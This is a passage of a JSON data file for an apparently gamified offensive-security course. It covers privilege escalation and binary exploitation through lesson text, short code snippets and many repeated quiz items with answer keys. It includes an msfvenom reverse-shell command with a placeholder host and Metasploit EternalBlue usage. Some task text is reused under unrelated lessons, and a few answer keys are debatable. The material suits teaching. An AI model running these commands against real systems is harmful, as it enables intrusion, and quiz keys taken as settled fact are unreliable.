permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"win-overview","cat":"Privilege Escalation","title":"Windows Privesc Overview","diff":1,"xp":75,"intro":"Systematic approach.","sections":[{"type":"text","content":"Systematic approach."},{"type":"code","lang":"bash","content":"whoami /all\nnet localgroup administrators\nwmic service list brief"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"First Windows privesc step?","opts":["Mimikatz","Enumerate: whoami /all","Reboot","Install tools"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"bof-intro","cat":"Exploitation","title":"Buffer Overflow Intro","diff":1,"xp":100,"intro":"Memory corruption basics.","sections":[{"type":"text","content":"Memory corruption basics."},{"type":"code","lang":"c","content":"void vuln(char *in) {\n char buf[64];\n    strcpy(buf, in);  // no bounds check\n}"},{"type":"text","content":"Exploitation is the bridge between finding a vulnerability and proving its impact. Understanding HOW an exploit works \u2014 not just running it \u2014 separates a script kiddie from a security professional. Every buffer overflow teaches memory layout, every injection teaches parsing, every deserialization teaches object handling."},{"type":"tip","content":"Before running any exploit, understand what it does. Read the source code or CVE advisory. Know what the exploit sends, what vulnerability it triggers, and what happens if it fails. On a real engagement, a crashed service is worse than no access \u2014 always test in a lab first."},{"type":"task","content":"Pick a simple buffer overflow challenge (like the ones on exploit.education or OverTheWire). Walk through the entire process manually: find the crash, determine the offset, control EIP, find bad characters, locate a gadget, generate shellcode, and get a shell. Do it without Metasploit."},{"type":"quiz","q":"Buffer overflow overwrites?","opts":["CPU","Memory beyond buffer (return address)","Disk","Network"],"ans":1},{"type":"quiz","q":"What is a 0-day exploit?","opts":["An exploit from day zero of a project","An exploit for an unpatched/unknown vulnerability","An expired exploit","A one-day old exploit"],"ans":1},{"type":"quiz","q":"Shellcode must be position-independent because...","opts":["It runs faster","Its load address is unknown at write time","The CPU requires it","It avoids antivirus"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"stack-bof","cat":"Exploitation","title":"Stack Buffer Overflow","diff":2,"xp":175,"intro":"Overwrite return address.","sections":[{"type":"text","content":"Overwrite return address."},{"type":"code","lang":"python","content":"buf = b'A'*76 + struct.pack('<I', 0xdeadbeef) + shellcode"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Stack overflow targets?","opts":["Heap","Stack return address","BSS","Data"],"ans":1},{"type":"quiz","q":"A NOP sled is used to...","opts":["Increase the target area for the shellcode jump","Encrypt the payload","Compress the exploit","Speed up execution"],"ans":0},{"type":"quiz","q":"What tool generates Metasploit payloads?","opts":["nmap","msfvenom","hashcat","burpsuite"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"heap-bof","cat":"Exploitation","title":"Heap Exploitation","diff":3,"xp":250,"intro":"Corrupt heap metadata.","sections":[{"type":"text","content":"Corrupt heap metadata."},{"type":"code","lang":"c","content":"char *a=malloc(64); free(a);\nchar *b=malloc(64); // reuses a's memory"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Use-after-free?","opts":["Overflow","Accessing freed memory","Leak","Stack corruption"],"ans":1},{"type":"quiz","q":"Which register typically holds the return address on x86?","opts":["EAX","ESP","EIP","EBX"],"ans":2},{"type":"quiz","q":"What is a 0-day exploit?","opts":["An exploit from day zero of a project","An exploit for an unpatched/unknown vulnerability","An expired exploit","A one-day old exploit"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"rop","cat":"Exploitation","title":"ROP Chains","diff":3,"xp":250,"intro":"Chain gadgets to bypass NX.","sections":[{"type":"text","content":"Chain gadgets to bypass NX."},{"type":"code","lang":"python","content":"rop = p64(pop_rdi) + p64(binsh) + p64(system)"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"ROP bypasses?","opts":["ASLR","NX/DEP","Canaries","PIE"],"ans":1},{"type":"quiz","q":"Shellcode must be position-independent because...","opts":["It runs faster","Its load address is unknown at write time","The CPU requires it","It avoids antivirus"],"ans":1},{"type":"quiz","q":"A NOP sled is used to...","opts":["Increase the target area for the shellcode jump","Encrypt the payload","Compress the exploit","Speed up execution"],"ans":0},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"fmt-str","cat":"Exploitation","title":"Format String Bugs","diff":2,"xp":175,"intro":"Exploit printf with user input.","sections":[{"type":"text","content":"Exploit printf with user input."},{"type":"code","lang":"c","content":"printf(user_input);  // dangerous!\n// %x reads stack, %n writes memory"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"printf specifier that WRITES?","opts":["%s","%n","%x","%d"],"ans":1},{"type":"quiz","q":"What tool generates Metasploit payloads?","opts":["nmap","msfvenom","hashcat","burpsuite"],"ans":1},{"type":"quiz","q":"Which register typically holds the return address on x86?","opts":["EAX","ESP","EIP","EBX"],"ans":2},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"shellcode","cat":"Exploitation","title":"Shellcode Basics","diff":2,"xp":175,"intro":"Write custom shellcode.","sections":[{"type":"text","content":"Write custom shellcode."},{"type":"code","lang":"bash","content":"msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f python"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Shellcode is?","opts":["Shell script","Machine code bytes","Python","Exploit framework"],"ans":1},{"type":"quiz","q":"What is a 0-day exploit?","opts":["An exploit from day zero of a project","An exploit for an unpatched/unknown vulnerability","An expired exploit","A one-day old exploit"],"ans":1},{"type":"quiz","q":"Shellcode must be position-independent because...","opts":["It runs faster","Its load address is unknown at write time","The CPU requires it","It avoids antivirus"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"msf-basics","cat":"Exploitation","title":"Metasploit Basics","diff":1,"xp":100,"intro":"Exploitation framework.","sections":[{"type":"text","content":"Exploitation framework."},{"type":"code","lang":"bash","content":"msfconsole\nsearch eternalblue\nuse exploit/windows/smb/ms17_010_eternalblue\nset RHOSTS target\nrun"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Metasploit search command?","opts":["find","search","lookup","query"],"ans":1},{"type":"quiz","q":"A NOP sled is used to...","opts":["Increase the target area for the shellcode jump","Encrypt the payload","Compress the exploit","Speed up execution"],"ans":0},{"type":"quiz","q":"What tool generates Metasploit payloads?","opts":["nmap","msfvenom","hashcat","burpsuite"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format 